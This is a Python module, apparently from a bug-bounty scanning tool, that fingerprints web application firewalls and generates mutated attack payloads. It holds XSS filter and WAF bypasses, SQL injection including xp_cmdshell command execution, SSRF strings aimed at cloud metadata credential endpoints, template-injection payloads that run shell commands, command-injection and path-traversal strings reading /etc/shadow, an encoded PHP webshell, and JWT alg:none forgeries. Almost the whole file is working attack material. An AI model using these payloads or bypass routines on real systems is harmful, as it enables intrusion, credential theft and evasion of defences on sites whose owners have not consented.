"""
Payload Generation Engine (v2 – Intelligence Upgrade)
======================================================

Dynamically generates and mutates payloads with:
- Context-aware XSS / SQLi / SSRF / SSTI / IDOR / CSRF / JWT / path-traversal / cmdi
- Polyglot payloads (multi-vuln in one shot)
- Multi-layer encoding chains (URL→HTML→Unicode cascades)
- WAF fingerprinting from response headers / body
- Response-adaptive mutation (analyze filtered chars → mutate accordingly)
- Technology-stack-aware payload selection
- Payload effectiveness tracking via LearningEngine integration
"""

from __future__ import annotations

import base64
import hashlib
import html
import random
import re
import string
import urllib.parse
from typing import Any

from bbhunter.config import get_config
from bbhunter.logger import get_logger
from bbhunter.models import VulnCategory

logger = get_logger()


# ───────────────────────────────────────────────────────────────
# WAF Fingerprinting Signatures
# ───────────────────────────────────────────────────────────────

WAF_SIGNATURES: dict[str, dict[str, Any]] = {
    "cloudflare": {
        "headers": {"server": "cloudflare", "cf-ray": ""},
        "body_patterns": [r"Attention Required.*Cloudflare", r"cf-error-details"],
        "blocked_codes": {403, 503},
    },
    "akamai": {
        "headers": {"x-akamai-transformed": "", "server": "AkamaiGHost"},
        "body_patterns": [r"Reference\s*#[\da-f.]+", r"Access Denied.*akamai"],
        "blocked_codes": {403},
    },
    "modsecurity": {
        "headers": {"server": "mod_security"},
        "body_patterns": [r"ModSecurity", r"NOYB", r"mod_security"],
        "blocked_codes": {403, 406},
    },
    "imperva": {
        "headers": {"x-cdn": "Incapsula", "x-iinfo": ""},
        "body_patterns": [r"Incapsula", r"_Incapsula_Resource"],
        "blocked_codes": {403},
    },
    "aws_waf": {
        "headers": {"x-amzn-requestid": ""},
        "body_patterns": [r"awswaf", r"Request blocked"],
        "blocked_codes": {403},
    },
    "sucuri": {
        "headers": {"x-sucuri-id": "", "server": "Sucuri"},
        "body_patterns": [r"Sucuri WebSite Firewall", r"sucuri\.net"],
        "blocked_codes": {403},
    },
    "f5_bigip": {
        "headers": {"server": "BigIP", "x-cnection": ""},
        "body_patterns": [r"BIG-IP", r"F5 Networks"],
        "blocked_codes": {403},
    },
    "fortinet": {
        "headers": {"server": "FortiWeb"},
        "body_patterns": [r"FortiGuard", r"fgd_icon"],
        "blocked_codes": {403},
    },
    "barracuda": {
        "headers": {"server": "BarracudaWAF"},
        "body_patterns": [r"Barracuda", r"barra_counter_session"],
        "blocked_codes": {403},
    },
    "wordfence": {
        "headers": {},
        "body_patterns": [r"wordfence", r"Generated by Wordfence"],
        "blocked_codes": {403, 503},
    },
}

# Technology stack → payload priority maps
TECH_PAYLOAD_MAP: dict[str, list[str]] = {
    "php": ["ssti", "sqli", "command_injection", "path_traversal", "xss"],
    "asp.net": ["sqli", "xss", "path_traversal", "ssti"],
    "java": ["ssti", "sqli", "ssrf", "command_injection"],
    "node": ["ssti", "ssrf", "xss", "xss"],
    "python": ["ssti", "ssrf", "command_injection", "sqli"],
    "ruby": ["ssti", "ssrf", "command_injection"],
    "graphql": ["sqli", "idor", "xss"],
    "wordpress": ["sqli", "xss", "path_traversal", "ssti"],
    "nginx": ["path_traversal", "ssrf", "open_redirect"],
    "apache": ["path_traversal", "ssrf"],
}


class PayloadEngine:
    """
    Advanced payload generation with mutation, WAF bypass, and adaptive intelligence.
    """

    def __init__(self):
        self.config = get_config()
        self._filter_cache: dict[str, set[str]] = {}
        self._waf_cache: dict[str, str | None] = {}

    # ===============================================================
    #  WAF FINGERPRINTING
    # ===============================================================

    def fingerprint_waf(
        self,
        headers: dict[str, str] | None = None,
        body: str = "",
        status_code: int = 200,
    ) -> str | None:
        """Detect WAF from HTTP response.  Returns WAF name or None."""
        if not headers and not body:
            return None
        hdrs_lower = {k.lower(): v.lower() for k, v in (headers or {}).items()}
        for waf_name, sig in WAF_SIGNATURES.items():
            for hdr_key, hdr_val in sig.get("headers", {}).items():
                actual = hdrs_lower.get(hdr_key, "")
                if actual and (not hdr_val or hdr_val in actual):
                    logger.info(f"🛡️  WAF detected: {waf_name} (header: {hdr_key})")
                    return waf_name
            for pattern in sig.get("body_patterns", []):
                if re.search(pattern, body, re.IGNORECASE):
                    logger.info(f"🛡️  WAF detected: {waf_name} (body pattern)")
                    return waf_name
            if status_code in sig.get("blocked_codes", set()):
                for hdr_key in sig.get("headers", {}):
                    if hdr_key in hdrs_lower:
                        return waf_name
        return None

    # ===============================================================
    #  RESPONSE-ADAPTIVE MUTATION
    # ===============================================================

    def analyze_filtering(self, original: str, reflected: str) -> dict[str, Any]:
        """
        Compare original payload to its reflection to detect filtering.

        Returns dict with filtered_chars, encoding_type, and bypass_strategy list.
        """
        result: dict[str, Any] = {
            "filtered_chars": set(),
            "encoding_type": None,
            "bypass_strategy": [],
        }
        if "&lt;" in reflected or "&gt;" in reflected or "&quot;" in reflected:
            result["encoding_type"] = "html_entity"
            result["bypass_strategy"].extend([
                "use_event_handlers", "use_javascript_protocol", "use_template_literals",
            ])
        if "%3C" in reflected or "%3E" in reflected:
            result["encoding_type"] = "url_encode"
            result["bypass_strategy"].append("double_url_encode")
        stripped = set()
        for ch in ['<', '>', '"', "'", '/', '(', ')', '{', '}', ';']:
            if ch in original and ch not in reflected:
                stripped.add(ch)
        result["filtered_chars"] = stripped
        if '<' in stripped or '>' in stripped:
            result["bypass_strategy"].extend(["use_event_handlers_no_tags", "use_svg_onload", "template_injection"])
        if '"' in stripped and "'" not in stripped:
            result["bypass_strategy"].append("single_quote_context")
        if "'" in stripped and '"' not in stripped:
            result["bypass_strategy"].append("double_quote_context")
        if '(' in stripped or ')' in stripped:
            result["bypass_strategy"].extend(["backtick_function_call", "tagged_template", "constructor_chain"])
        if ';' in stripped:
            result["bypass_strategy"].append("comma_separator")
        return result

    def mutate_for_bypass(self, payload: str, filtering: dict[str, Any]) -> list[str]:
        """Generate mutated payloads designed to bypass the detected filtering."""
        mutations: list[str] = []
        filtered = filtering.get("filtered_chars", set())
        strategies = filtering.get("bypass_strategy", [])
        _strat_payloads: dict[str, list[str]] = {
            "use_event_handlers": [
                '"><img src=x onerror=alert(1)>', '" onfocus=alert(1) autofocus="',
                '" onmouseover=alert(1) "', '<details open ontoggle=alert(1)>',
            ],
            "use_event_handlers_no_tags": [
                '" onfocus=alert(1) autofocus="', "' onfocus='alert(1)' autofocus='",
                'javascript:alert(1)//',
            ],
            "use_svg_onload": ['<svg/onload=alert(1)>', '<svg onload=alert&#40;1&#41;>'],
            "backtick_function_call": ['<img src=x onerror=alert`1`>', '<svg/onload=alert`1`>'],
            "constructor_chain": [
                "[].constructor.constructor('alert(1)')()",
                "self['ale'+'rt'](1)", "window['ale'+'rt'](1)", "top['al'+'ert'](1)",
                'Reflect.apply(alert,window,[1])',
            ],
            "double_url_encode": [],  # handled below
            "single_quote_context": [],
            "double_quote_context": [],
            "template_injection": ["{{constructor.constructor(\"alert(1)\")()}}", "${alert(1)}", "#{alert(1)}"],
            "comma_separator": [],
            "use_javascript_protocol": ["javascript:alert(1)", "javascript:alert(document.domain)"],
            "use_template_literals": ["${alert(1)}", "`${alert(1)}`"],
            "tagged_template": ["alert`1`"],
        }
        for strategy in strategies:
            if strategy == "double_url_encode":
                mutations.append(urllib.parse.quote(urllib.parse.quote(payload)))
            elif strategy == "single_quote_context":
                mutations.append(payload.replace('"', "'"))
            elif strategy == "double_quote_context":
                mutations.append(payload.replace("'", '"'))
            elif strategy == "comma_separator":
                mutations.append(payload.replace(';', ','))
            else:
                mutations.extend(_strat_payloads.get(strategy, []))
        if '<' in filtered and '>' in filtered:
            mutations = [m for m in mutations if '<' not in m]
        return mutations

    # ===============================================================
    #  ENCODING CHAINS  (multi-layer encoding)
    # ===============================================================

    def encoding_chain(self, payload: str, chain: list[str]) -> str:
        """Apply a sequence of encoding layers."""
        result = payload
        for layer in chain:
            if layer == "url":
                result = urllib.parse.quote(result, safe="")
            elif layer == "double_url":
                result = urllib.parse.quote(urllib.parse.quote(result, safe=""), safe="")
            elif layer == "html":
                result = html.escape(result)
            elif layer == "unicode":
                result = "".join(f"\\u{ord(c):04x}" for c in result)
            elif layer == "hex":
                result = "".join(f"\\x{ord(c):02x}" for c in result)
            elif layer == "base64":
                result = base64.b64encode(result.encode()).decode()
            elif layer == "jschar":
                result = "+".join(f"String.fromCharCode({ord(c)})" for c in result)
            elif layer == "jsunicode":
                result = "".join(f"\\u{ord(c):04x}" for c in result)
            elif layer == "jsoctal":
                result = "".join(f"\\{oct(ord(c))[2:]}" for c in result)
        return result

    def generate_encoding_chains(self, payload: str) -> list[str]:
        """Generate multiple encoding-chain variants of a payload."""
        chains = [
            ["url"], ["url", "url"], ["html"], ["url", "html"],
            ["html", "url"], ["unicode"], ["hex"], ["jschar"],
            ["jsunicode"], ["url", "html", "url"],
        ]
        results = []
        for chain in chains:
            encoded = self.encoding_chain(payload, chain)
            if encoded != payload:
                results.append(encoded)
        return results

    # ===============================================================
    #  XSS PAYLOADS
    # ===============================================================

    def generate_xss_payloads(
        self,
        context: str = "html",
        waf: str | None = None,
        mutation_level: int = 3,
        tech_stack: list[str] | None = None,
        filtering: dict[str, Any] | None = None,
    ) -> list[str]:
        base_payloads: dict[str, list[str]] = {
            "html": [
                '<script>alert(1)</script>',
                '<img src=x onerror=alert(1)>',
                '<svg/onload=alert(1)>',
                '<body onload=alert(1)>',
                '<input onfocus=alert(1) autofocus>',
                '<marquee onstart=alert(1)>',
                '<details open ontoggle=alert(1)>',
                '<video><source onerror=alert(1)>',
                '<audio src onerror=alert(1)>',
                '<math><mtext><table><mglyph><svg><mtext><textarea><path id=x onerror=alert(1)>',
                '<object data="data:text/html,<script>alert(1)</script>">',
            ],
            "attribute": [
                '" onmouseover="alert(1)',
                "' onfocus='alert(1)' autofocus='",
                '" onfocus="alert(1)" autofocus="',
                "javascript:alert(1)",
                '" style="background:url(javascript:alert(1))',
                '" accesskey="x" onclick="alert(1)" x="',
                "' onpointerenter='alert(1)'",
            ],
            "javascript": [
                "'-alert(1)-'", "';alert(1)//", '";alert(1)//',
                "\\'-alert(1)//", "</script><script>alert(1)</script>",
                "${alert(1)}", "{{constructor.constructor('alert(1)')()}}",
                "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
                "'-eval(atob('YWxlcnQoMSk='))-'",
            ],
            "url": [
                "javascript:alert(1)",
                "data:text/html,<script>alert(1)</script>",
                "javascript:alert(document.domain)",
                "javascript:void(alert(1))",
                "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
            ],
            "dom": [
                '#"><img src=x onerror=alert(1)>',
                "javascript:alert(1)#",
                "'-alert(1)-'",
                'x" onfocus=alert(1) autofocus="',
                "</script><img src=x onerror=alert(1)>",
                "{{constructor.constructor('alert(1)')()}}",
            ],
        }
        payloads = list(base_payloads.get(context, base_payloads["html"]))
        if mutation_level >= 2:
            payloads.extend(self._case_mutations(payloads))
        if mutation_level >= 3:
            payloads.extend(self._encoding_mutations(payloads))
        if mutation_level >= 4:
            payloads.extend(self._obfuscation_mutations(payloads))
        if mutation_level >= 5:
            payloads.extend(self._advanced_waf_bypass(payloads))
            for p in base_payloads.get(context, base_payloads["html"])[:3]:
                payloads.extend(self.generate_encoding_chains(p))
        if waf:
            payloads.extend(self._waf_specific_bypass(waf, "xss"))
        if filtering:
            for p in base_payloads.get(context, base_payloads["html"])[:5]:
                payloads.extend(self.mutate_for_bypass(p, filtering))
        payloads.extend(self._polyglot_xss())
        return list(dict.fromkeys(payloads))

    def _polyglot_xss(self) -> list[str]:
        """Universal polyglot XSS payloads that work across multiple contexts."""
        return [
            "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%%0D%%0A%%0d%%0a//</stYle/</titLe/</telerik/</telerik'|\"\\",
            "'\"><img src=x onerror=alert(1)//",
            '"><svg/onload=alert(String.fromCharCode(88,83,83))>',
            "'-alert(1)-'\"<img/src=x onerror=alert(1)>{{7*7}}${7*7}",
            "\"><script>alert(String.fromCharCode(88,83,83))</script>",
            '<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">',
        ]

    # ===============================================================
    #  SQLi PAYLOADS
    # ===============================================================

    def generate_sqli_payloads(
        self,
        db_type: str = "generic",
        technique: str = "all",
        waf: str | None = None,
    ) -> list[str]:
        payloads: list[str] = []
        if technique in ("all", "error"):
            payloads.extend([
                "'", "''", '"', "' OR '1'='1", "' OR '1'='1'--",
                "' UNION SELECT NULL--", "' UNION SELECT NULL,NULL--",
                "' UNION SELECT NULL,NULL,NULL--",
                "1' ORDER BY 1--", "1' ORDER BY 10--",
                "' AND 1=CONVERT(int,@@version)--",
                "' AND extractvalue(1,concat(0x7e,version()))--",
                "' AND updatexml(1,concat(0x7e,version()),1)--",
            ])
        if technique in ("all", "boolean"):
            payloads.extend([
                "' AND '1'='1", "' AND '1'='2",
                "' AND 1=1--", "' AND 1=2--",
                "1 AND 1=1", "1 AND 1=2",
                "' OR 1=1#", "' OR 1=2#",
                "' AND SUBSTRING(@@version,1,1)='5'--",
                "') AND ('1'='1", "') AND ('1'='2",
            ])
        if technique in ("all", "time"):
            payloads.extend([
                "' OR SLEEP(5)--", "'; WAITFOR DELAY '0:0:5'--",
                "' OR pg_sleep(5)--", "' AND SLEEP(5)--",
                "1; SELECT SLEEP(5)--",
                "1 AND (SELECT * FROM (SELECT SLEEP(5))a)--",
                "' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--",
                "1' AND BENCHMARK(5000000,MD5('test'))--",
            ])
        if technique in ("all", "union"):
            for cols in range(1, 11):
                nulls = ",".join(["NULL"] * cols)
                payloads.append(f"' UNION SELECT {nulls}--")
        if technique in ("all", "stacked"):
            payloads.extend([
                "'; SELECT 1--", "'; SELECT pg_sleep(5)--",
                "'; EXEC xp_cmdshell('whoami')--",
            ])
        db_payloads: dict[str, list[str]] = {
            "mysql": [
                "' UNION SELECT @@version,NULL--",
                "' UNION SELECT table_name,NULL FROM information_schema.tables--",
                "' UNION SELECT table_name,column_name FROM information_schema.columns--",
                "' AND ORD(MID(@@version,1,1))>51--",
                "/*!50000SELECT*/ 1--",
            ],
            "postgres": [
                "' UNION SELECT version(),NULL--",
                "' UNION SELECT table_name,NULL FROM information_schema.tables--",
                "'; COPY (SELECT '') TO PROGRAM 'id'--",
                "'||PG_SLEEP(5)--",
            ],
            "mssql": [
                "' UNION SELECT @@version,NULL--",
                "'; EXEC xp_cmdshell('whoami')--",
                "' AND 1=CONVERT(int,DB_NAME())--",
            ],
            "oracle": [
                "' UNION SELECT banner,NULL FROM v$version--",
                "' UNION SELECT table_name,NULL FROM all_tables--",
            ],
            "sqlite": [
                "' UNION SELECT sql,NULL FROM sqlite_master--",
                "' UNION SELECT name,NULL FROM sqlite_master WHERE type='table'--",
            ],
        }
        payloads.extend(db_payloads.get(db_type, []))
        if waf:
            payloads.extend(self._waf_sqli_bypass(waf))
        return list(dict.fromkeys(payloads))

    def _waf_sqli_bypass(self, waf: str) -> list[str]:
        return [
            "' /*!UNION*/ /*!SELECT*/ NULL--",
            "' UN/**/ION SEL/**/ECT NULL--",
            "' uNiOn SeLeCt NULL--",
            "'+UNION+SELECT+NULL--",
            "'%09UNION%09SELECT%09NULL--",
            "'%0aUNION%0aSELECT%0aNULL--",
            "' UNION/**/SELECT/**/NULL--",
            "'%2520UNION%2520SELECT%2520NULL--",
            "' OR '1'='1&id=' OR '1'='1",
        ]

    # ===============================================================
    #  SSRF PAYLOADS
    # ===============================================================

    def generate_ssrf_payloads(self, bypass_level: int = 3) -> list[str]:
        payloads = [
            "http://127.0.0.1", "http://localhost", "http://[::1]",
            "http://169.254.169.254/latest/meta-data/",
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "http://169.254.169.254/latest/user-data/",
            "http://metadata.google.internal/computeMetadata/v1/",
            "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
            "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
            "http://169.254.169.254/metadata/v1/",
            "http://100.100.100.200/latest/meta-data/",
        ]
        if bypass_level >= 2:
            payloads.extend([
                "http://0x7f000001", "http://2130706433", "http://0177.0.0.1",
                "http://127.0.0.1.nip.io", "http://127.1", "http://0",
                "http://0.0.0.0", "http://[0:0:0:0:0:ffff:127.0.0.1]",
                "http://127.000.000.001", "http://[::ffff:127.0.0.1]",
                "http://[::ffff:7f00:1]",
            ])
        if bypass_level >= 3:
            payloads.extend([
                "http://evil.com@127.0.0.1", "http://127.0.0.1#@evil.com",
                "http://127.0.0.1%00@evil.com", "http://127.0.0.1?@evil.com",
                "http://127.0.0.1%23@evil.com",
                "dict://127.0.0.1:11211/", "gopher://127.0.0.1:6379/_",
                "tftp://127.0.0.1/test",
                "file:///etc/passwd", "file:///c:/windows/win.ini",
                "http://1.1.1.1&@127.0.0.1/", "http://127.0.0.1:80@evil.com/",
                "http://httpbin.org/redirect-to?url=http://169.254.169.254/",
            ])
        return payloads

    # ===============================================================
    #  SSTI PAYLOADS
    # ===============================================================

    def _ssti_payloads(self) -> list[str]:
        return [
            "{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "*{7*7}", "@(7*7)",
            "{7*7}", "${{7*7}}", "{{7*'7'}}",
            # Jinja2 / Flask
            "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
            "{{cycler.__init__.__globals__.os.popen('id').read()}}",
            "{{request.__class__.__mro__[2].__subclasses__()}}",
            "{%import os%}{{os.popen('id').read()}}",
            "{{''.__class__.__mro__[1].__subclasses__()}}",
            # Twig (PHP)
            "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}",
            # Mako
            "${__import__('os').popen('id').read()}",
            "<%import os; x=os.popen('id').read()%>${x}",
            # Pug / Jade (Node)
            "#{root.process.mainModule.require('child_process').execSync('id')}",
            # Freemarker (Java)
            '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}',
            # Smarty (PHP)
            "{php}echo `id`;{/php}",
            # Velocity (Java)
            "#set($x='')##$x.class.forName('java.lang.Runtime').getRuntime().exec('id')",
            # ERB (Ruby)
            "<%= system('id') %>", "<%= `id` %>",
            # Constructor bypass
            "{{constructor.constructor('return this')()}}",
            "{{range.constructor('return this')()}}",
        ]

    # ===============================================================
    #  IDOR PAYLOADS
    # ===============================================================

    def generate_idor_payloads(self, current_id: str = "1") -> list[str]:
        payloads: list[str] = []
        try:
            num = int(current_id)
            payloads.extend([str(num - 1), str(num + 1), str(num + 100), "0", "-1", str(num * 2), "99999999"])
        except ValueError:
            pass
        payloads.extend([
            "1", "2", "admin", "root", "test",
            "00000000-0000-0000-0000-000000000000",
            current_id.replace("-", ""),
            current_id.upper(), current_id.lower(),
            hashlib.md5(b"1").hexdigest(),
            hashlib.md5(b"admin").hexdigest(),
            base64.b64encode(b"1").decode(),
            base64.b64encode(b"admin").decode(),
        ])
        return payloads

    # ===============================================================
    #  COMMAND INJECTION PAYLOADS
    # ===============================================================

    def generate_cmdi_payloads(self) -> list[str]:
        return [
            "; id", "| id", "|| id", "& id", "&& id", "$(id)", "`id`",
            "; whoami", "| whoami",
            "; sleep 5", "| sleep 5", "|| sleep 5", "&& sleep 5",
            "$(sleep 5)", "`sleep 5`",
            ";{id}", "| {id}", ";$IFS'id'", "|$IFS'id'",
            ";%0aid", "|%0aid", ";i\\d", "|i\\d",
            "& whoami", "| type C:\\windows\\win.ini",
            "& dir", "&& dir", "| ping -n 5 127.0.0.1",
            "%0a id", "%0d%0a id", "\\n id", "\\r\\n id",
        ]

    # ===============================================================
    #  PATH TRAVERSAL PAYLOADS
    # ===============================================================

    def generate_path_traversal_payloads(self) -> list[str]:
        targets = ["/etc/passwd", "/etc/shadow", "/proc/self/environ",
                    "C:\\windows\\win.ini"]
        payloads: list[str] = []
        for t in targets:
            linux = t.lstrip("/")
            payloads.extend([
                f"../{linux}", f"../../{linux}", f"../../../{linux}",
                f"../../../../{linux}", f"../../../../../{linux}",
                f"..../{linux}", f"....//....//..../{linux}",
                f"../../../{linux}%00", f"../../../{linux}\x00.png",
                f"..%2f..%2f..%2f{linux}", f"..%252f..%252f..%252f{linux}",
                f"..%c0%af..%c0%af..%c0%af{linux}",
                f"php://filter/convert.base64-encode/resource={linux}",
            ])
        payloads.extend([
            "php://input",
            "php://filter/convert.base64-encode/resource=index.php",
            "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==",
            "expect://id",
        ])
        return payloads

    # ===============================================================
    # OPEN REDIRECT PAYLOADS
    # ===============================================================

    def generate_open_redirect_payloads(self) -> list[str]:
        return [
            "https://evil.com", "//evil.com", "/\\evil.com",
            "https://evil.com%00.target.com", "https://evil.com?.target.com",
            "https://evil.com#.target.com", "https://evil.com@target.com",
            "https://target.com.evil.com", "//evil.com/%2e%2e",
            "///evil.com", "////evil.com", "/https://evil.com",
            "https:evil.com", "javascript:alert(1)",
            "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
            "/evil.com", "/%0d/evil.com", "/%09/evil.com",
        ]

    # ===============================================================
    #  JWT PAYLOADS
    # ===============================================================

    def generate_jwt_payloads(self, token: str = "") -> list[str]:
        payloads: list[str] = []
        none_header = base64.urlsafe_b64encode(b'{"alg":"none","typ":"JWT"}').rstrip(b'=').decode()
        payloads.extend([f"{none_header}...", f"{none_header}.."])
        for alg in ["None", "NONE", "nOnE"]:
            h = base64.urlsafe_b64encode(f'{{"alg":"{alg}","typ":"JWT"}}'.encode()).rstrip(b'=').decode()
            payloads.append(f"{h}...")
        jwk_header = base64.urlsafe_b64encode(
            b'{"alg":"HS256","typ":"JWT","jwk":{"kty":"oct","k":""}}'
        ).rstrip(b'=').decode()
        payloads.append(jwk_header)
        kid_header = base64.urlsafe_b64encode(
            b'{"alg":"HS256","typ":"JWT","kid":"../../dev/null"}'
        ).rstrip(b'=').decode()
        payloads.append(kid_header)
        kid_sqli = base64.urlsafe_b64encode(
            b"""{"alg":"HS256","typ":"JWT","kid":"' UNION SELECT 'key'--"}"""
        ).rstrip(b'=').decode()
        payloads.append(kid_sqli)
        return payloads

    # ===============================================================
    #  POLYGLOT PAYLOADS
    # ===============================================================

    def generate_polyglot_payloads(self) -> list[str]:
        """Multi-vuln detection payloads for initial sweeps."""
        return [
            "'\"><img src=x onerror=alert(1)>{{7*7}}' OR '1'='1'--",
            "{{7*7}}<script>alert(1)</script>../../../etc/passwd",
            "' OR 1=1-- ;id",
            "http://127.0.0.1/?redirect=//evil.com",
            "javascript:alert(1)//evil.com",
            "{{7*7}}${7*7}<%=7*7%>#{7*7}*{7*7}",
            "bbhunter\"'><{{7*7}}${7*7}`${{7*7}}`\\",
        ]

    # ===============================================================
    #  MUTATION HELPERS
    # ===============================================================

    def _case_mutations(self, payloads: list[str]) -> list[str]:
        mutations = []
        for p in payloads:
            mutated = "".join(c.upper() if random.random() > 0.5 else c.lower() for c in p)
            if mutated != p:
                mutations.append(mutated)
        return mutations

    def _encoding_mutations(self, payloads: list[str]) -> list[str]:
        mutations = []
        for p in payloads:
            mutations.append(urllib.parse.quote(p))
            mutations.append(urllib.parse.quote(urllib.parse.quote(p)))
            mutations.append(html.escape(p).replace("&amp;", "&"))
            mutations.append(p.replace("<", "\u003c").replace(">", "\u003e"))
        return mutations

    def _obfuscation_mutations(self, payloads: list[str]) -> list[str]:
        mutations = []
        for p in payloads:
            mutations.append(p.replace("<", "%00<"))
            mutations.append(p.replace("<script>", "<scr\tipt>"))
            mutations.append(p.replace("<script>", "<scr\nipt>"))
            mutations.append(p.replace("alert(1)", "alert`1`"))
            mutations.append(p.replace("alert(1)", "[].constructor.constructor('alert(1)')()"))
            mutations.append(p.replace("alert", "al\\u0065rt"))
            mutations.append(p.replace("<script>", "<scr<!---->ipt>"))
        return mutations

    def _advanced_waf_bypass(self, payloads: list[str]) -> list[str]:
        return [
            '<svg/onload=alert(1)>', '<svg onload=alert&lpar;1&rpar;>',
            '<math><mi//xlink:href="data:x,<script>alert(1)</script>">',
            '"><img src=x onerror=prompt(1)>',
            '<isindex type=image src=1 onerror=alert(1)>',
            '"><svg/onload=confirm(1)>',
            '${7*7}', '{{7*7}}',
            'self["ale"+"rt"](1)', 'window["ale"+"rt"](1)',
            '<iframe srcdoc="<script>alert(1)</script>">',
            '<svg><animate onbegin=alert(1) attributeName=x dur=1s>',
            '<svg><set onbegin=alert(1) attributeName=x to=1>',
            '<xss id=x tabindex=1 onfocus=alert(1)></xss>',
            '<base href="javascript:/a/-alert(1)//">',
            'top[/al/.source+/ert/.source](1)',
            'window[atob("YWxlcnQ=")](1)',
        ]

    def _waf_specific_bypass(self, waf: str, vuln_type: str) -> list[str]:
        bypasses: dict[str, dict[str, list[str]]] = {
            "cloudflare": {
                "xss": [
                    '<img src=x onerror=alert(1)>',
                    '<svg/onload=alert(String.fromCharCode(49))>',
                    '<a href="javascript:void(0)" onmouseover=alert(1)>hover</a>',
                    '<details/open/ontoggle=confirm`1`>',
                    '<svg/onload=self[`al`+`ert`](1)>',
                ],
                "sqli": ["' /*!50000UNION*/ /*!50000SELECT*/ NULL--", "' %55NION %53ELECT NULL--"],
            },
            "akamai": {
                "xss": ['"><svg/onload=prompt(1)>', '<details open ontoggle=alert(1)>',
                         '<math><mi//xlink:href="data:x,<script>alert(1)</script>">'],
                "sqli": ["' UN/**/ION SEL/**/ECT NULL--", "' /*!UNION*/ /*!SELECT*/ NULL--"],
            },
            "modsecurity": {
                "xss": ['<svg/onload=alert(1)>', '"><img src=x onerror=prompt`1`>',
                         '<svg onload=alert&lpar;1&rpar;>'],
                "sqli": ["' /*!UNION*/ /*!SELECT*/ NULL--", "' AND 1=1--"],
            },
            "imperva": {
                "xss": ['<svg/onload=alert(1)>', '<details/open/ontoggle=confirm(1)>',
                         '<input onfocus=alert(1) autofocus>'],
                "sqli": ["' /*!00000UNION*//*!00000SELECT*/ NULL--", "' %55nion %53elect NULL--"],
            },
            "aws_waf": {
                "xss": ['"><img src=x onerror=prompt`1`>', '<svg onload=alert(1)>'],
                "sqli": ["' /*!UNION*/ /*!SELECT*/ 1--"],
            },
            "sucuri": {
                "xss": ['<svg/onload=prompt(1)>', '<details open ontoggle=alert(1)>'],
                "sqli": ["' UN%49ON SE%4CECT NULL--"],
            },
        }
        return bypasses.get(waf.lower(), {}).get(vuln_type, [])

    # ===============================================================
    #  TECHNOLOGY-AWARE PAYLOAD SELECTION
    # ===============================================================

    def payloads_for_tech_stack(
        self, technologies: list[str], waf: str | None = None,
    ) -> dict[str, list[str]]:
        """Return {category: [payloads]} ordered by relevance to the tech."""
        priority_cats: list[str] = []
        for tech in technologies:
            tech_lower = tech.lower()
            for key, cats in TECH_PAYLOAD_MAP.items():
                if key in tech_lower:
                    for c in cats:
                        if c not in priority_cats:
                            priority_cats.append(c)
                    break
        if not priority_cats:
            priority_cats = ["xss", "sqli", "ssrf", "ssti"]
        result: dict[str, list[str]] = {}
        for cat in priority_cats:
            result[cat] = self.generate(cat, waf=waf, mutation_level=3)
        return result

    # ===============================================================
    #  LEARNING ENGINE INTEGRATION
    # ===============================================================

    def get_ranked_payloads(
        self,
        category: VulnCategory,
        learning_engine: Any = None,
        **kwargs: Any,
    ) -> list[str]:
        """Payloads ranked by historical effectiveness (if learning data exists)."""
        standard = self.get_payloads(category, **kwargs)
        if learning_engine is None:
            return standard
        try:
            effectiveness = learning_engine.get_payload_effectiveness(category)
            if not effectiveness:
                return standard
            score_map = {e["payload"]: e["success_count"] for e in effectiveness}
            proven = sorted(
                [p for p in standard if p in score_map],
                key=lambda p: score_map.get(p, 0), reverse=True,
            )
            unproven = [p for p in standard if p not in score_map]
            return proven + unproven
        except Exception as exc:
            logger.debug(f"Payload ranking failed: {exc}")
            return standard

    # ===============================================================
    #  UNIFIED API
    # ===============================================================

    def get_payloads(self, category: VulnCategory, **kwargs: Any) -> list[str]:
        generators = {
            VulnCategory.XSS: self.generate_xss_payloads,
            VulnCategory.SQLI: self.generate_sqli_payloads,
            VulnCategory.SSRF: self.generate_ssrf_payloads,
            VulnCategory.IDOR: self.generate_idor_payloads,
            VulnCategory.COMMAND_INJECTION: self.generate_cmdi_payloads,
            VulnCategory.PATH_TRAVERSAL: self.generate_path_traversal_payloads,
            VulnCategory.OPEN_REDIRECT: self.generate_open_redirect_payloads,
            VulnCategory.JWT: self.generate_jwt_payloads,
        }
        gen = generators.get(category)
        return gen(**kwargs) if gen else []

    def generate(
        self, category: str, context: str = "html",
        waf: str | None = None, mutation_level: int = 3,
    ) -> list[str]:
        """Unified entry point.  Accepts string category names."""
        cat_lower = category.lower()
        dispatch: dict[str, Any] = {
            "xss": lambda: self.generate_xss_payloads(context=context, waf=waf, mutation_level=mutation_level),
            "sqli": lambda: self.generate_sqli_payloads(waf=waf),
            "ssrf": lambda: self.generate_ssrf_payloads(),
            "ssti": lambda: self._ssti_payloads(),
            "idor": lambda: self.generate_idor_payloads(),
            "command_injection": lambda: self.generate_cmdi_payloads(),
            "cmdi": lambda: self.generate_cmdi_payloads(),
            "path_traversal": lambda: self.generate_path_traversal_payloads(),
            "lfi": lambda: self.generate_path_traversal_payloads(),
            "open_redirect": lambda: self.generate_open_redirect_payloads(),
            "redirect": lambda: self.generate_open_redirect_payloads(),
            "jwt": lambda: self.generate_jwt_payloads(),
            "polyglot": lambda: self.generate_polyglot_payloads(),
        }
        gen = dispatch.get(cat_lower)
        return gen() if gen else []

    def generate_payloads(
        self, category: str, context: str = "html",
        waf: str | None = None, mutation_level: int = 3,
    ) -> list[str]:
        """Alias for generate() — used by engine_bridge.py."""
        return self.generate(category=category, context=context, waf=waf, mutation_level=mutation_level)
